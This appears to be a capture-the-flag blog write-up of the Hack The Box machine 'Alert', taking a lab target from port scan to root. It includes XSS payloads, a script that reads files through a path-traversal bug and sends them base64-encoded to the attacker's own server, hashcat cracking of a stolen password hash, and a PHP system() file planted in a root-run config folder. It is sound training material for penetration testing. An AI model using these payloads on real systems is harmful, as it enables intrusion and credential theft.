Home

Alert – Hack The Box – @lautarovculic

, , , , , , ,

User.txt

				
					sudo nmap -p- -T4 --min-rate 2500 -sSCV -vvv 10.129.177.186

Output:

				
					PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa REDACTED
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 REDACTED
|   256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 REDACTED
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

Lets add the alert.htb host to our /etc/hosts file.

				
					sudo echo "10.129.177.186 alert.htb" | sudo tee -a /etc/hosts

We can see that here’s the web page.

Take around to inspect about functionalities and requests using burpsuite.
We can see that if we upload an test.md with content

				
					# h1
## h2

It’s reflected in the output when we press View Markdown button.
And we can share the link.

But we can make an XSS if we put the content in the test.md file this simple payload

				
					<img decoding="async" src="x" onerror="alert('XSS')">

Or

				
					[Click me](javascript:alert('XSS'))

There are an LFI vulnerability.
Before, run the sudo python3 -m http.server 80 for receive the request.
Sending this .md file with the content

				
					<script>

fetch('/messages.php?file=../../../etc/passwd').then(r => r.text()).then(d => fetch('http://10.10.14.37/?data=' + btoa(d)));

</script>

We’ll receive the following reposnse

				
					<a class="share-button" href="http://alert.htb/visualizer.php?link_share=67424552eda2d9.48939714.md" target="_blank">Share Markdown</a>

Send the link to contact form and the response will be in base 64.
We found the user albert.

And get the hash
Burpsuite request for upload file

				
					POST /visualizer.php HTTP/1.1
Host: alert.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------37350420874820472663516859324
Content-Length: 407
Origin: http://alert.htb
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://alert.htb/index.php?page=alert
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------37350420874820472663516859324
Content-Disposition: form-data; name="file"; filename="exploit2.md"
Content-Type: text/markdown

<script>
fetch('/messages.php?file=../../../../../../var/www/statistics.alert.htb/.htpasswd').then(r => r.text()).then(d => fetch('http://10.10.14.37/?data=' + btoa(d)));
</script>

-----------------------------37350420874820472663516859324--

And we’ll receive another response with the albert hash.
10.129.177.186 - - [23/Nov/2024 18:12:58] "GET /?data=PHByZT5hbGJlcnQ6JGFwcjEkYk1vUkJKT2ckaWdHOFdCdFExeFlEVFFkTGpTV1pRLwo8L3ByZT4K HTTP/1.1" 200

$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Crack it with hashcat

				
					hashcat -m 1600 -a 0 hash.txt /usr/share/seclists/rockyou.txt

The password is manchesterunited
Log in via ssh

				
					ssh albert@10.129.177.186

And get the user flag

				
					albert@alert:~$ cat user.txt
daf53c0********3e8ee81c
albert@alert:~$

Root.txt

Running netstat -nat we can found that the internal 8080 port are open

				
					Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN

Execute the command ps -aux | grep 8080 for get more information

				
					root         977  0.0  0.6 206768 25068 ?        Ss   Nov21   0:05 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

Root are running the website-monitor.

				
					albert@alert:/opt/website-monitor$ ls -la
total 96
drwxrwxr-x 7 root root        4096 Oct 12 01:07 .
drwxr-xr-x 4 root root        4096 Oct 12 00:58 ..
drwxrwxr-x 2 root management  4096 Nov 23 21:34 config

If we run the command id we are in the management group. And we can executeread and write in the config folder.

Inside of config folder we can create a reverse shell in php that get the root flag.

				
					<?php system('cat /root/root.txt');?>

With curl get the content

				
					curl http://127.0.0.1:8080/config/shell.php

Output

				
					albert@alert:/opt/website-monitor/config$ curl http://127.0.0.1:8080/config/shell.php
73c4e2*************025bf8f2d
albert@alert:/opt/website-monitor/config$

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *